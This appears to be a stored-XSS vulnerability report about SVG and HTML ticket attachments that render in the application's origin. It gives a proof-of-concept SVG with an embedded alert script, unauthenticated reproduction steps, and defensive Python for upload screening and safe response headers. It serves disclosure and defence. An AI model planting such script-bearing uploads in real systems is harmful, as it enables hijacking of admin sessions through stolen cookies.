Stored XSS via upload ‘Attachments’ with format .svg or .html
When an attachment is opened, files in some formats (such as .svg and .html) are rendered as a document by the browser rather than downloaded. Any JavaScript that was injected into the attachment before upload is therefore executed in the context of the application's origin.
// PoC.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>
Create a ticket as an unauthenticated user
Upload the .svg or .html file as an attachment
The XSS triggers when an admin opens the attachment
This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.
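The fix for this class of bug is on the server side: never let a user-uploaded SVG or HTML file be rendered inline from the application's origin, and screen SVG uploads for active content. The following is an added example written for this page, not code from the affected project, showing both checks. The function and variable names (`svg_has_active_content`, `attachment_headers`, `upload_decision`) are assumptions; the sample SVG inputs are constructed for the example, the first one mirroring the PoC above.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import PurePosixPath

# Constructed sample input: an SVG carrying a script element, like the PoC in the report.
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>"""

# Constructed sample input: a plain vector image with no script or event handlers.
CLEAN_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="300" height="100">
<rect width="300" height="100" style="fill:rgb(0,0,255)" />
</svg>"""

# Extensions a browser will render as a document (and so may run script from).
ACTIVE_CONTENT_EXTENSIONS = {".svg", ".html", ".htm", ".xhtml", ".xml", ".mht", ".mhtml"}
HTML_EXTENSIONS = {".html", ".htm", ".xhtml", ".mht", ".mhtml"}

# Byte-level sniff: browsers may treat a file as markup regardless of its extension.
_MARKUP_SNIFF = re.compile(rb"<\s*(!doctype|html|svg|script|body|iframe|object|embed)\b", re.I)


def looks_like_markup(data: bytes) -> bool:
    """True if the leading bytes look like HTML/SVG markup."""
    return bool(_MARKUP_SNIFF.search(data[:1024]))


def svg_has_active_content(data: bytes) -> bool:
    """True if an SVG contains script, foreignObject, on* handlers or javascript: links.

    Note: xml.etree does not defend against entity-expansion attacks; in production
    parse untrusted XML with defusedxml or an equivalent hardened parser.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return True  # fail closed: an unparseable "SVG" is not worth the risk
    for el in root.iter():
        tag = el.tag.split("}")[-1].lower() if isinstance(el.tag, str) else ""
        if tag in ("script", "foreignobject"):
            return True
        for name, value in el.attrib.items():
            local = name.split("}")[-1].lower()  # strip namespace, e.g. xlink:href -> href
            if local.startswith("on"):
                return True
            if local == "href" and value.strip().lower().startswith("javascript:"):
                return True
    return False


def _safe_filename(filename: str) -> str:
    """Reduce a client-supplied name to characters that are safe inside a header."""
    return re.sub(r"[^\w.\-]", "_", PurePosixPath(filename).name)


def attachment_headers(filename: str, data: bytes) -> dict:
    """Response headers for serving a stored attachment.

    Anything that is (or sniffs as) markup is forced to download with a generic
    Content-Type, so it is never executed in the application's origin. nosniff and a
    sandboxing CSP are applied to every attachment response as defence in depth.
    """
    ext = PurePosixPath(filename).suffix.lower()
    name = _safe_filename(filename)
    headers = {
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }
    if ext in ACTIVE_CONTENT_EXTENSIONS or looks_like_markup(data):
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = f'attachment; filename="{name}"'
    else:
        headers["Content-Disposition"] = f'inline; filename="{name}"'
    return headers


def upload_decision(filename: str, data: bytes) -> str:
    """Accept/reject policy applied at upload time, before the file is stored."""
    ext = PurePosixPath(filename).suffix.lower()
    if ext in HTML_EXTENSIONS:
        return "reject"  # no legitimate reason for ticket attachments to be HTML
    if ext == ".svg":
        return "reject" if svg_has_active_content(data) else "accept"
    if looks_like_markup(data):
        return "reject"  # markup hiding behind an innocuous extension
    return "accept"


if __name__ == "__main__":
    print("PoC.svg upload:", upload_decision("PoC.svg", POC_SVG))
    print("logo.svg upload:", upload_decision("logo.svg", CLEAN_SVG))
    print("PoC.svg headers:", attachment_headers("PoC.svg", POC_SVG))
```

Both layers matter: the upload check stops the report's PoC at the door, while the header policy means that even an SVG that slipped past the filter (or an already-stored one) is downloaded rather than rendered when the admin clicks it, and the sandbox CSP keeps any rendering that does happen off the application's origin.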